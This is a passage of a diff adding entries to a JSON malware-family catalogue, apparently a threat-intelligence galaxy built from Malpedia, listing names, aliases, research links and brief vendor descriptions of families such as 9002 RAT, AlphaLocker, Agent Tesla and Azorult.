}, + "uuid": "808445e6-f51c-4b5d-a812-78102bf60d24", + "value": "Tater PrivEsc", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.thundershell", + "https://github.com/Mr-Un1k0d3r/ThunderShell" + ] + }, + "uuid": "fd9904a6-6e06-4b50-8bfd-64ffb793d4a4", + "value": "ThunderShell", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.wmimplant", + "https://www.fireeye.com/blog/threat-research/2017/03/wmimplant_a_wmi_ba.html" + ] + }, + "uuid": "d1150a1a-a2f4-4954-b22a-a85b7876408e", + "value": "WMImplant", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/py.brickerbot", + "https://www.bleepingcomputer.com/news/security/brickerbot-author-claims-he-bricked-two-million-devices/", + "https://www.bleepingcomputer.com/news/security/brickerbot-author-retires-claiming-to-have-bricked-over-10-million-iot-devices/", + "https://ics-cert.us-cert.gov/alerts/ICS-ALERT-17-102-01A", + "http://seclists.org/fulldisclosure/2017/Mar/7", + "https://security.radware.com/ddos-threats-attacks/brickerbot-pdos-permanent-denial-of-service/", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/BrickerBot-mod_plaintext-Analysis/", + "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf", + "http://depastedihrn3jtw.onion/show.php?md5=2c822a990ff22d56f3b9eb89ed722c3f" + ] + }, + "uuid": "f0ff8751-c182-4e9c-a275-81bb03e0cdf5", + "value": "BrickerBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/py.saphyra", + "https://securityintelligence.com/dissecting-hacktivists-ddos-tool-saphyra-revealed/", + "https://www.youtube.com/watch?v=Bk-utzAlYFI" + ] + }, + "uuid": "30a22cdb-9393-460b-86ae-08d97c626155", + "value": "Saphyra", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/symbian.flexispy", + "https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/" + ] + }, + "uuid": "4305d59a-0d07-4021-a902-e7996378898b", + "value": "FlexiSpy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.7ev3n", + "https://blog.malwarebytes.com/threat-analysis/2016/05/7ev3n-ransomware/", + "https://www.cyber.nj.gov/threat-profiles/ransomware-variants/7ev3n" + ] + }, + "uuid": "ac2608e9-7851-409f-b842-e265b877a53c", + "value": "7ev3n", + "description": "The NJCCIC describes 7ev3n as a ransomware \"that targets the Windows OS and spreads via spam emails containing malicious attachments, as well as file sharing networks. It installs multiple files in the LocalAppData folder, each of which controls different functions including disabling bootup recovery options, deleting the ransomware installation file, encrypting data, and gaining administrator privileges. This variant also adds registry keys that disables various Windows function keys such as F1, F3, F4, F10, Alt, Num Lock, Ctrl, Enter, Escape, Shift, and Tab. Files encrypted by 7ev3n are labeled with a .R5A extension. It also locks victims out of Windows recovery options making it challenging to repair the damage done by 7ev3n.\"" + }, + { + "meta": { + "synonyms": [ + "Hydraq", + "McRAT" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.9002", + "https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html", + "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf", + "https://researchcenter.paloaltonetworks.com/2015/09/chinese-actors-use-3102-malware-in-attacks-on-us-government-and-eu-media/", + "https://community.hpe.com/t5/Security-Research/9002-RAT-a-second-building-on-the-left/ba-p/6894315", + "http://researchcenter.paloaltonetworks.com/2016/07/unit-42-attack-delivers-9002-trojan-through-google-drive/", + "https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html", + "https://www.fireeye.com/blog/threat-research/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html", + "https://www.proofpoint.com/us/threat-insight/post/operation-rat-cook-chinese-apt-actors-use-fake-game-thrones-leaks-lures", + "https://blog.trendmicro.com/trendlabs-security-intelligence/supply-chain-attack-operation-red-signature-targets-south-korean-organizations/" + ] + }, + "uuid": "bab647d7-c9d6-4697-8fd2-1295c7429e1f", + "value": "9002 RAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "PinkKite" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.abaddon_pos", + "https://www.proofpoint.com/us/threat-insight/post/AbaddonPOS-A-New-Point-Of-Sale-Threat-Linked-To-Vawtrak", + "https://threatpost.com/new-pos-malware-pinkkite-takes-flight/130428/" + ] + }, + "uuid": "a492a3e0-13cb-4b7d-93c1-027e7e69b44d", + "value": "AbaddonPOS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.abbath_banker" + ] + }, + "uuid": "e46262cd-961f-4c7d-8976-0d35a066ab83", + "value": "Abbath Banker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.acridrain", + "https://thisissecurity.stormshield.com/2018/08/28/acridrain-stealer/" + ] + }, + "uuid": "ffc368a5-2cd0-44ca-869b-223fdb462c41", + "value": "AcridRain", + "description": "AcridRain is a password stealer written in C/C++. This malware can steal credentials, cookies, credit cards from multiple browsers. It can also dump Telegram and Steam sessions, rob Filezilla recent connections, and more." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.acronym", + "https://www.arbornetworks.com/blog/asert/acronym-m-is-for-malware/" + ] + }, + "uuid": "bee73d0f-8ff3-44ba-91dc-d883884c754e", + "value": "Acronym", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.adam_locker", + "https://twitter.com/JaromirHorejsi/status/813712587997249536", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-recap-dec-19-dec-31-2016" + ] + }, + "uuid": "1ed36f9a-ae00-4d16-bbf7-e97217385fb1", + "value": "AdamLocker", + "description": "Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim’s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.adkoob", + "https://news.sophos.com/en-us/2018/07/29/adkoob-information-thief-targets-facebook-ad-purchase-info/" + ] + }, + "uuid": "ace3cb99-3523-44a1-92cc-9f002cf364bf", + "value": "win.adkoob", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.advisorsbot", + "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-2-advisorsbot" + ] + }, + "uuid": "e3f49ec0-614e-4070-a620-5196d45df7b5", + "value": "AdvisorsBot", + "description": "AdvisorsBot is a downloader named after early command and control domains that all contained the word \"advisors\". The malware is written in C and employs a number of anti-analysis features such as junk code, stack strings and Windows API function hashing." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.adylkuzz", + "https://www.proofpoint.com/us/threat-insight/post/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue-doublepulsar" + ] + }, + "uuid": "3d6c3ed5-804d-4d0b-8a01-68bc54ae8c58", + "value": "Adylkuzz", + "description": "" + }, + { + "meta": { + "synonyms": [ + "ComRAT", + "Sun rootkit" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_btz", + "http://blog.threatexpert.com/2008/11/agentbtz-threat-that-hit-pentagon.html", + "https://securelist.com/blog/virus-watch/58551/agent-btz-a-source-of-inspiration/", + "https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified", + "https://blog.gdata.de/2015/01/23779-weiterentwicklung-anspruchsvoller-spyware-von-agent-btz-zu-comrat", + "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf", + "http://www.intezer.com/new-variants-of-agent-btz-comrat-found/", + "http://www.intezer.com/new-variants-of-agent-btz-comrat-found-part-2/" + ] + }, + "uuid": "d9cc15f7-0880-4ae4-8df4-87c58338d6b8", + "value": "Agent.BTZ", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla", + "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analyzing-various-layers-agentteslas-packing/", + "https://malwarebreakdown.com/2018/01/11/malspam-entitled-invoice-attched-for-your-reference-delivers-agent-tesla-keylogger/", + "https://www.zscaler.com/blogs/research/agent-tesla-keylogger-delivered-using-cybersquatting", + "https://blog.fortinet.com/2017/06/28/in-depth-analysis-of-net-malware-javaupdtr", + "https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html", + "https://thisissecurity.stormshield.com/2018/01/12/agent-tesla-campaign/", + "https://blogs.forcepoint.com/security-labs/part-two-camouflage-netting" + ] + }, + "uuid": "b88e29cf-79d9-42bc-b369-0383b5e04380", + "value": "Agent Tesla", + "description": "A .NET based keylogger and RAT readily available to actors. Logs keystrokes and the host's clipboard and beacons this information back to the C2." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.aldibot", + "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/aldibot" + ] + }, + "uuid": "43ec8adc-0658-4765-be20-f22679097fab", + "value": "Aldibot", + "description": "According to Trend Micro Encyclopia:\r\nALDIBOT first appeared in late August 2012 in relevant forums. Variants can steal passwords from the browser Mozilla Firefox, instant messenger client Pidgin, and the download manager jDownloader. ALDIBOT variants send the gathered information to their command-and-control (C&C) servers.\r\n\r\nThis malware family can also launch Distributed Denial of Service (DDoS) attacks using different protocols such as HTTP, TCP, UDP, and SYN. It can also perform flood attacks via Slowloris and Layer 7.\r\n\r\nThis bot can also be set up as a SOCKS proxy to abuse the infected machine as a proxy for any protocols.\r\n\r\nThis malware family can download and execute arbitrary files, and update itself. Variants can steal information, gathering the infected machine’s hardware identification (HWID), host name, local IP address, and OS version.\r\n\r\nThis backdoor executes commands from a remote malicious user, effectively compromising the affected system." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.alice_atm", + "http://blog.trendmicro.com/trendlabs-security-intelligence/alice-lightweight-compact-no-nonsense-atm-malware/" + ] + }, + "uuid": "41bfc8ad-ce2c-4ede-aa54-b3240a5cc8ca", + "value": "Project Alice", + "description": "" + }, + { + "meta": { + "synonyms": [ + "alina_spark", + "katrina", + "alina_eagle" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.alina_pos", + "http://www.xylibox.com/2013/02/alina-34-pos-malware.html", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Casting-a-Shadow-on-POS/", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Following-The-Shadow-Part-2/", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Following-The-Shadow-Part-1/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/two-new-pos-malware-affecting-us-smbs/", + "https://www.nuix.com/blog/alina-continues-spread-its-wings", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina-POS-malware--sparks--off-a-new-variant/" + ] + }, + "uuid": "27d90cd6-095a-4c28-a6f2-d1b47eae4f70", + "value": "Alina POS", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Starman" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.allaple", + "https://researchcenter.paloaltonetworks.com/2014/08/hunting-mutex/", + "https://trapx.com/wp-content/uploads/2017/08/White_Paper_TrapX_AllapleWorm.pdf" + ] + }, + "uuid": "6aabb492-e282-40fb-a840-fe4e643ec094", + "value": "Allaple", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.alma_communicator", + "https://researchcenter.paloaltonetworks.com/2017/11/unit42-oilrig-deploys-alma-communicator-dns-tunneling-trojan/" + ] + }, + "uuid": "a0881a0c-e677-495b-b475-290af09bb716", + "value": "Alma Communicator", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.alma_locker" + ] + }, + "uuid": "b5138914-6c2b-4c8e-b182-d94973fe5a6b", + "value": "AlmaLocker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.alpc_lpe", + "https://www.welivesecurity.com/2018/09/05/powerpool-malware-exploits-zero-day-vulnerability/" + ] + }, + "uuid": "86517f1a-6e67-47ba-95dd-84b3125ad983", + "value": "ALPC Local PrivEsc", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphabet_ransomware", + "https://twitter.com/JaromirHorejsi/status/813714602466877440" + ] + }, + "uuid": "5060756f-8385-465d-a7dd-7bf09a54da92", + "value": "Alphabet Ransomware", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphalocker", + "https://blog.cylance.com/an-introduction-to-alphalocker" + ] + }, + "uuid": "c1b9e8c5-9283-4dbe-af10-45956a446fb7", + "value": "AlphaLocker", + "description": "A new form of ransomware named AlphaLocker that is built by cybercriminals for cybercriminals. Like all incarnations of Ransomware As A Service (RaaS), the AlphaLocker malware program can be purchased and launched by pretty much anyone who wants to get into the ransomware business. What makes AlphaLocker different from other forms of RaaS is its relatively cheap cost. The ransomware can be purchased for just $65 in bitcoin.\r\n\r\nAlphaLocker, also known as Alpha Ransomware, is based on the EDA2 ransomware, an educational project open-sourced on GitHub last year by Turkish researcher Utku Sen. A Russian coder seems to have cloned this repository before it was taken down and used it to create his ransomware, a near-perfect clone of EDA2. The ransomware's author, is said to be paying a great deal of attention to updating the ransomware with new features, so it would always stay ahead of antivirus engines, and evade detection.\r\n\r\nAlphaLocker's encryption process starts when the ransomware contacts its C&C server. The server generates a public and a private key via the RSA-2048 algorithm, sending the public key to the user's computer and saving the private key to its server. On the infected computer, the ransomware generates an AES-256 key for each file it encrypts, and then encrypts this key with the public RSA key, and sent to the C&C server.\r\n\r\nTo decrypt their files, users have to get ahold of the private RSA key which can decrypt the AES-encrypted files found on their computers. Users have to pay around 0.35 Bitcoin (~$450) to get this key, packaged within a nice decrypter." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphanc", + "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group" + ] + }, + "uuid": "6e94186c-987e-43da-be2d-9b44f254c8b9", + "value": "AlphaNC", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.alreay", + "https://securelist.com/blog/sas/77908/lazarus-under-the-hood/" + ] + }, + "uuid": "d258de39-e351-47e3-b619-731c87f13d9c", + "value": "Alreay", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Olmarik", + "Pihar", + "TDSS", + "TDL" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.alureon", + "http://contagiodump.blogspot.com/2012/02/purple-haze-bootkit.html", + "http://contagiodump.blogspot.com/2011/02/tdss-tdl-4-alureon-32-bit-and-64-bit.html", + "http://contagiodump.blogspot.com/2010/02/list-of-aurora-hydraq-roarur-files.html" + ] + }, + "uuid": "ad4e6779-59a6-4ad6-98de-6bd871ddb271", + "value": "Alureon", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Adupihan" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.amtsol", + "https://blogs.technet.microsoft.com/mmpc/2017/06/07/platinum-continues-to-evolve-find-ways-to-maintain-invisibility/", + "http://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf" + ] + }, + "uuid": "ce25929c-0358-477c-a85e-f0bdfcc99a54", + "value": "AMTsol", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Gamarue", + "B106-Gamarue", + "B67-SS-Gamarue", + "b66" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.andromeda", + "http://blog.morphisec.com/andromeda-tactics-analyzed", + "https://blog.avast.com/andromeda-under-the-microscope", + "https://eternal-todo.com/blog/yet-another-andromeda-gamarue-analysis", + "http://www.0xebfe.net/blog/2013/03/30/fooled-by-andromeda/", + "https://byte-atlas.blogspot.ch/2015/04/kf-andromeda-bruteforcing.html", + "https://blog.fortinet.com/2014/04/23/andromeda-2-7-features", + "https://blog.fortinet.com/2014/05/19/new-anti-analysis-tricks-in-andromeda-2-08", + "https://www.virusbulletin.com/virusbulletin/2013/08/andromeda-2-7-features", + "https://blog.fortinet.com/2014/04/16/a-good-look-at-the-andromeda-botnet", + "http://resources.infosecinstitute.com/andromeda-bot-analysis-part-two/", + "http://resources.infosecinstitute.com/andromeda-bot-analysis/", + "https://blogs.technet.microsoft.com/mmpc/2017/12/04/microsoft-teams-up-with-law-enforcement-and-other-partners-to-disrupt-gamarue-andromeda/", + "https://eternal-todo.com/blog/andromeda-gamarue-loves-json", + "https://www.europol.europa.eu/newsroom/news/andromeda-botnet-dismantled-in-international-cyber-operation", + "https://www.virusbulletin.com/virusbulletin/2018/02/review-evolution-andromeda-over-years-we-say-goodbye/" + ] + }, + "uuid": "07f46d21-a5d4-4359-8873-18e30950df1a", + "value": "Andromeda", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.anel", + "https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-adds-updated-tools-to-its-arsenal/" + ] + }, + "uuid": "a180afcc-d42d-4600-b70f-af27aaf851b7", + "value": "Anel", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Latinus" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.antilam" + ] + }, + "uuid": "02be7f3a-f3bf-447b-b8b4-c78432b82694", + "value": "Antilam", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.apocalipto", + "https://www.visakorea.com/dam/VCOM/download/merchants/Grocery_Malware_04242013.pdf" + ] + }, + "uuid": "d3e16d46-e436-4757-b962-6fd393056415", + "value": "Apocalipto", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.apocalypse_ransom", + "http://blog.emsisoft.com/2016/06/29/apocalypse-ransomware-which-targets-companies-through-insecure-rdp/" + ] + }, + "uuid": "e87d9df4-b464-4458-ae1f-31cea40d5f96", + "value": "Apocalypse", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ardamax" + ] + }, + "uuid": "4f5c2f8b-06ef-4fb3-b03c-afdcafa88de5", + "value": "ArdaMax", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.arefty", + "http://www.welivesecurity.com/2016/03/23/new-self-protecting-usb-trojan-able-to-avoid-detection/" + ] + }, + "uuid": "bf135b0a-3120-42c4-ba58-c80f9ef689bf", + "value": "Arefty", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Aaron Keylogger" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.arik_keylogger", + "https://www.invincea.com/2016/09/crimeware-as-a-service-goes-mainstream/", + "http://remote-keylogger.net/" + ] + }, + "uuid": "3572d725-bf13-43ef-9511-bdbb7692ab06", + "value": "Arik Keylogger", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ars_loader", + "https://www.flashpoint-intel.com/blog/meet-ars-vbs-loader/", + "https://twitter.com/Racco42/status/1001374490339790849", + "https://www.blueliv.com/blog-news/research/ars-loader-evolution-zeroevil-ta545-airnaine/" + ] + }, + "uuid": "1a4f99cc-c078-41f8-9749-e1dc524fc795", + "value": "ARS VBS Loader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ascentloader" + ] + }, + "uuid": "4e3fa4e6-bc7d-4024-b191-ccafa5347c13", + "value": "AscentLoader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.aspc" + ] + }, + "uuid": "bc128d41-33e6-40ec-aaf2-9a05da9a0a27", + "value": "ASPC", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Aseljo", + "BadSrc" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.asprox", + "http://oalabs.openanalysis.net/2014/12/04/inside-the-new-asprox-kuluoz-october-2013-january-2014/", + "https://researchcenter.paloaltonetworks.com/2015/08/whats-next-in-malware-after-kuluoz/" + ] + }, + "uuid": "ba557993-f64e-4538-8f13-dafaa3c0db00", + "value": "Asprox", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.athenago", + "http://blog.talosintel.com/2017/02/athena-go.html" + ] + }, + "uuid": "587eff78-47be-4022-a1b5-7857340a9ab2", + "value": "AthenaGo RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ati_agent", + "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" + ] + }, + "uuid": "e248d80d-de8e-45de-b6d0-3740e5b34573", + "value": "ATI-Agent", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmii", + "https://securelist.com/atmii-a-small-but-effective-atm-robber/82707/" + ] + }, + "uuid": "f2a7c867-6380-4cbe-b524-50727a29f0c6", + "value": "ATMii", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmitch", + "https://securelist.com/blog/sas/77918/atmitch-remote-administration-of-atms/" + ] + }, + "uuid": "5f427b3a-7162-4421-b2cd-e6588d518448", + "value": "ATMitch", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmosphere", + "https://www.group-ib.com/resources/threat-research/silence.html" + ] + }, + "uuid": "15918921-93b8-4b3a-a612-e1d1f769c420", + "value": "Atmosphere", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmspitter", + "https://quoscient.io/reports/QuoINT_INTBRI_New_ATMSpitter.pdf", + "https://quoscient.io/reports/QuoINT_INTBRI_ATMSpitter_v2.pdf" + ] + }, + "uuid": "5a03a6ff-e127-4cd2-aab1-75f1e3ecc187", + "value": "ATMSpitter", + "description": "The ATMSpitter family consists of command-line tools designed to control the cash dispenser of an ATM through function calls to either CSCWCNG.dll or MFSXFS.dll.\r\nBoth libraries are legitimate Windows drivers used to interact with the components of different ATM models." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.august_stealer", + "https://hazmalware.blogspot.de/2016/12/analysis-of-august-stealer-malware.html", + "https://www.proofpoint.com/us/threat-insight/post/august-in-december-new-information-stealer-hits-the-scene" + ] + }, + "uuid": "2ee0122a-701d-487d-9ac1-7d91e4f99d78", + "value": "August Stealer", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Riodrv" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.auriga", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "e3065e43-503b-4496-921b-7601dd3d6abd", + "value": "Auriga", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.aurora", + "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/" + ] + }, + "uuid": "2f899e3e-1a46-43ea-8e68-140603ce943d", + "value": "Aurora", + "description": "Ransomware" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.avast_disabler", + "https://securityintelligence.com/exposing-av-disabling-drivers-just-in-time-for-lunch/" + ] + }, + "uuid": "96a695de-2560-4f10-bbd6-3bc2ac27b7f7", + "value": "AvastDisabler", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.avcrypt", + "https://www.bleepingcomputer.com/news/security/the-avcrypt-ransomware-tries-to-uninstall-your-av-software/" + ] + }, + "uuid": "0568fcc6-755f-416e-9c5b-22232cd7ae0e", + "value": "AVCrypt", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.aveo", + "http://researchcenter.paloaltonetworks.com/2016/08/unit42-aveo-malware-family-targets-japanese-speaking-users/" + ] + }, + "uuid": "606b160a-5180-4255-a1db-b2b9e8a52e95", + "value": "Aveo", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.avzhan", + "https://blog.malwarebytes.com/threat-analysis/2018/02/avzhan-ddos-bot-dropped-by-chinese-drive-by-attack/" + ] + }, + "uuid": "b12d9354-f67b-47dd-944c-82cfdff7b9a3", + "value": "Avzhan", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ayegent" + ] + }, + "uuid": "c84a6b0b-28a5-4293-b8fc-6a6eeb7b5f70", + "value": "Ayegent", + "description": "" + }, + { + "meta": { + "synonyms": [ + "PuffStealer", + "Rultazo" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult", + "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/", + "https://blog.minerva-labs.com/puffstealer-evasion-in-a-cloak-of-multiple-layers", + "https://malwarebreakdown.com/2017/07/24/the-seamless-campaign-drops-ramnit-follow-up-malware-azorult-stealer-smoke-loader-etc/", + "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan", + "http://www.vkremez.com/2017/07/lets-learn-reversing-credential-and.html", + "https://malwarebreakdown.com/2017/11/12/seamless-campaign-delivers-ramnit-via-rig-ek-at-188-225-82-158-follow-up-malware-is-azorult-stealer/", + "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" + ] + }, + "uuid": "0dfbe48e-a3da-4265-975e-1eb37ad9c51c", + "value": "Azorult", + "description": "AZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit." + }, + { + "meta": { + "synonyms": [ + "SNOWBALL" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.babar", + "https://www.cyphort.com/babar-suspected-nation-state-spyware-spotlight/", + "https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope", + "http://www.spiegel.de/media/media-35683.pdf", + "https://drive.google.com/a/cyphort.com/file/d/0B9Mrr-en8FX4dzJqLWhDblhseTA/", + "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analysing-10-year-old-snowball/" + ] + }, + "uuid": "947dffa1-0184-48d4-998e-1899ad97e93e", + "value": "Babar", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.babymetal", + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" + ] + }, + "uuid": "30c2e5c6-851d-4f3a-8b6e-2e7b69a26467", + "value": "BABYMETAL", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.backspace", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" + ] + }, + "uuid": 